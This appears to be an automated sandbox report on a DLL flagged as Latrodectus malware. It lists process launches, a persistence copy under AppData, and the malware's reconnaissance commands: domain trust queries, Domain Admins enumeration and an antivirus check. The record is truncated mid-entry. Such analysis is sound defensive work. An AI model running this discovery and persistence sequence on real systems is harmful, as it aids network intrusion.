                                                                                                Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:23:15:06
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\loaddll64.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll"
                                                                                                Imagebase:0x7ff6d1030000
                                                                                                File size:165'888 bytes
                                                                                                MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:1
                                                                                                Start time:23:15:06
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:23:15:06
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:23:15:06
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
                                                                                                Imagebase:0x7ff7a9eb0000
                                                                                                File size:71'680 bytes
                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000002.2270295766.0000014614300000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:4
                                                                                                Start time:23:15:06
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
                                                                                                Imagebase:0x7ff7a9eb0000
                                                                                                File size:71'680 bytes
                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000004.00000002.2008946508.00000237C16B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000004.00000002.2008986338.00000237C16C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:8
                                                                                                Start time:23:15:07
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1
                                                                                                Imagebase:0x7ff7a9eb0000
                                                                                                File size:71'680 bytes
                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3178827371.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3440249504.000001E3B56E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3416817098.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3264216780.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3041610792.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:9
                                                                                                Start time:23:15:07
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
                                                                                                Imagebase:0x7ff723b80000
                                                                                                File size:570'736 bytes
                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:11
                                                                                                Start time:23:15:10
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq
                                                                                                Imagebase:0x7ff7a9eb0000
                                                                                                File size:71'680 bytes
                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:12
                                                                                                Start time:23:15:11
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                Imagebase:0x7ff715980000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:14
                                                                                                Start time:23:15:11
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1996,i,16797134848863919888,4031310649045437557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                Imagebase:0x7ff715980000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:15
                                                                                                Start time:23:15:13
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime
                                                                                                Imagebase:0x7ff7a9eb0000
                                                                                                File size:71'680 bytes
                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:20
                                                                                                Start time:23:15:28
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
                                                                                                Imagebase:0x7ff723b80000
                                                                                                File size:570'736 bytes
                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:22
                                                                                                Start time:23:17:19
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c ipconfig /all
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:23
                                                                                                Start time:23:17:19
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:24
                                                                                                Start time:23:17:19
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\ipconfig.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:ipconfig /all
                                                                                                Imagebase:0x7ff623390000
                                                                                                File size:35'840 bytes
                                                                                                MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:25
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c systeminfo
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:26
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:27
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\systeminfo.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:systeminfo
                                                                                                Imagebase:0x7ff64d800000
                                                                                                File size:110'080 bytes
                                                                                                MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:29
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                Imagebase:0x7ff6ef0c0000
                                                                                                File size:496'640 bytes
                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:30
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c nltest /domain_trusts
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:31
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:32
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\nltest.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:nltest /domain_trusts
                                                                                                Imagebase:0x7ff7fda60000
                                                                                                File size:540'672 bytes
                                                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:33
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c nltest /domain_trusts /all_trusts
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:34
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:35
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\nltest.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:nltest /domain_trusts /all_trusts
                                                                                                Imagebase:0x7ff7fda60000
                                                                                                File size:540'672 bytes
                                                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:36
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c net view /all /domain
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:37
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:38
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:net view /all /domain
                                                                                                Imagebase:0x7ff660440000
                                                                                                File size:59'904 bytes
                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:39
                                                                                                Start time:23:17:33
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c net view /all
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:40
                                                                                                Start time:23:17:33
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:41
                                                                                                Start time:23:17:33
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:net view /all
                                                                                                Imagebase:0x7ff660440000
                                                                                                File size:59'904 bytes
                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:42
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c net group "Domain Admins" /domain
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:43
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:44
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:net group "Domain Admins" /domain
                                                                                                Imagebase:0x7ff660440000
                                                                                                File size:59'904 bytes
                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:45
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net1.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\net1 group "Domain Admins" /domain
                                                                                                Imagebase:0x7ff769ed0000
                                                                                                File size:183'808 bytes
                                                                                                MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:46
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                                                                                                Imagebase:0x7ff75ebd0000
                                                                                                File size:576'000 bytes
                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:47
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:48
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c net config workstation
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:49
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:50
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:net config workstation
                                                                                                Imagebase:0x7ff660440000
                                                                                                File size:59'904 bytes
                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:51
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net1.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\net1 config workstation
                                                                                                Imagebase:0x7ff769ed0000
                                                                                                File size:183'808 bytes
                                                                                                MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:52
                                                                                                Start time:23:17:47
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:53
                                                                                                Start time:23:17:47
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:54
                                                                                                Start time:23:17:47
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                                                                                                Imagebase:0x7ff75ebd0000
                                                                                                File size:576'000 bytes
                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:55
                                                                                                Start time:23:17:47
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:findstr /V /B /C:displayName
                                                                                                Imagebase:0x7ff71f450000
                                                                                                File size:36'352 bytes
                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:56
                                                                                                Start time:23:17:48
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c whoami /groups
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:57
                                                                                                Start time:23:17:48
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:
